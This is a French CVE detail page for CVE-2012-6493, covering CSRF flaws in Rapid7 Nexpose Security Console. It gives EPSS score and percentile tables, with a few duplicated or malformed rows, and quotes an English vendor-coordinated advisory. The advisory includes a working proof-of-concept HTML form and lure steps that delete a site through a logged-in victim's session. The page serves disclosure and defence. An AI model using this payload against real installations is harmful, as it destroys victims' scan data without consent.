CVE-2012-6493 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	8.1%	–	–
2022-04-03	–	–	8.1%	–	–
2022-07-24	–	–	7.51%	–	–
2022-11-13	–	–	7.51%	–	–
2022-11-20	–	–	7.51%	–	–
2022-12-25	–	–	7.51%	–	–
2023-01-01	–	–	7.51%	–	–
2023-02-26	–	–	7.51%	–	–
2023-03-12	–	–	–	0.82%	–
2023-07-09	–	–	–	0.82%	–
2024-02-11	–	–	–	0.82%	–
2024-04-14	–	–	–	0.82%	–
2024-06-02	–	–	–	0.82%	–
2024-08-25	–	–	–	0.78%	–
2024-12-22	–	–	–	0.73%	–
2025-03-02	–	–	–	1.01%	–
2025-01-19	–	–	–	0.73%	–
2025-03-09	–	–	–	1.01%	–
2025-03-18	–	–	–	–	0.56%
2025-04-15	–	–	–	–	0.56%
2025-07-01	–	–	–	–	0.56%
2025-07-04	–	–	–	–	0.56%
2025-07-16	–	–	–	–	0.42%
2025-09-20	–	–	–	–	0.39%
2025-09-20	–	–	–	–	0.39,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	82%
2022-04-03	93%
2022-07-24	92%
2022-11-13	93%
2022-11-20	92%
2022-12-25	93%
2023-01-01	92%
2023-02-26	93%
2023-03-12	79%
2023-07-09	8%
2024-02-11	81%
2024-04-14	82%
2024-06-02	82%
2024-08-25	82%
2024-12-22	81%
2025-03-02	84%
2025-01-19	81%
2025-03-09	84%
2025-03-18	66%
2025-04-15	67%
2025-07-01	68%
2025-07-04	67%
2025-07-16	61%
2025-09-20	59%
2025-09-20	59%

Product: Nexpose Security Console Vendor: Rapid7 Version: < 5.5.3 Tested Version: 5.5.1 Vendor Notified Date: December 19, 2012 Release Date: January 2, 2013 Risk: High Authentication: None required Remote: Yes Description: Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose Security Console 5.5.3 and below allow remote attackers to submit actions on a legitimate user’s behalf. By not properly checking each URL, an attacker can execute requests on behalf of a legitimate user. If an authenticated user is tricked into visiting a specially crafted page, it may be possible to perform user-initiated actions on the web application using the victim’s established session. Successful exploitation of this vulnerability resulted in deleting scan data and sites during the proof-of-concept. Exploit steps for proof-of-concept: 1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains: [code] <html> <!-- Nexpose CSRF PoC --> <body> <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" method="POST" enctype="multipart/form-data"> <input type="submit" value="delete site" /> </form> <script> //document.forms[0].submit(); //uncomment to auto-submit </script> </body> </html> [/code] 2. Lure victim to http://attackersite.com/nexpose-csrf.htm. 3. Site with ID 1 is deleted when form is submitted. Vendor Notified: Yes Vendor Response: Quickly escalated and resolved. Vendor Update: Remediated in 5.5.4. Reference: CVE-2012-6493 https://community.rapid7.com/docs/DOC-2065#release5 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) Credit: Robert Gilbert HALOCK Security Labs